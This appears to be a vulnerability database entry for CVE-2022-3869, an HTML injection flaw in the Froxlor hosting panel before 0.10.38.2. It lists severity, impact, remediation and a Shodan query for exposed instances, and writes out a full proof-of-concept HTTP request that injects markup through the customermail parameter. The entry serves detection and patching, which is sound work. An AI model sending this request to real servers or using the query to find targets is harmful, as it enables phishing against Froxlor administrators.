🔙 목록으로 돌아가기

CVE-2022-3869: Froxlor < 0.10.38.2. - HTML Injection

TitleFroxlor < 0.10.38.2. - HTML Injection
Authorctflearner
SeverityMedium
ImpactAttackers can inject arbitrary HTML content through the customermail parameter, potentially displaying fake content to users and facilitating phishing attacks against Froxlor administrators.
RemediationUpdate Froxlor to version 0.10.38.2 or later that properly sanitizes the customermail parameter and encodes HTML output.
CVSS Score6.1
EPSS Score0.13165
CVE IDCVE-2022-3869
CWE IDCWE-79
Shodan Querytitle:"Froxlor"
Tags cve2023 cve froxlor html vuln

🔍 Vulnerability Description

HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.

🌐 HTTP Request

GET /index.php?showmessage=4&customermail="><h2>TEST</h2> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3869.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-3869.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A